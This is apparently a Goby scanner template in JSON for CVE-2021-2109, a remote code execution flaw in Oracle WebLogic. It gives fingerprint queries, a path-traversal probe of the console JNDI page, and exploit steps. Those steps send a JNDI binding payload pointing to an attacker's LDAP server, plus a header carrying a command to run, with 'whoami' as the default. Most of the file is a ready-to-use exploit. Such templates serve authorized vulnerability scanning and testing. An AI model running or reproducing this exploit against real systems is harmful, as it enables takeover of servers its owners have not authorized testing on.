Goby/json/Oracle_Weblogic_LDAP_RCE_CV...


{
"Name": "Oracle Weblogic LDAP RCE CVE-2021-2109",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "app=\"Oracle-WeblogicPortal\" || app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
"Description": "Oracle WebLogic Server is the industry leading application server for building enterprise applications using Java EE standards, and deploying them on a reliable, scalable runtime with low cost of ownership. It is strategically integrated with Oracles full product and cloud service portfolio. Oracle WebLogic Server provides compatibility with prior versions, and supports new features for developer productivity, high availability, manageability and deployment to cloud native Kubernetes-based environments.",
"Product": "Oracle Weblogic",
"Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
"Author": "",
"Impact": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).",
"Recommendation": "",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-2109"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Cmd",
"Type": "input",
"Value": "whoami"
},
{
"Name": "Ldap",
"Type": "input",
"Value": "ldap://xxx.xxx.xxx;xxx:1389"
},
{
"Name": "Cookie",
"Type": "input",
"Value": "ADMINCONSOLESESSION=xxxxx"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "JNDI",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
"follow_redirect": true,
"header": {
"cmd": "{{{Cmd}}}",
"Cookie": "{{{Cookie}}}"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}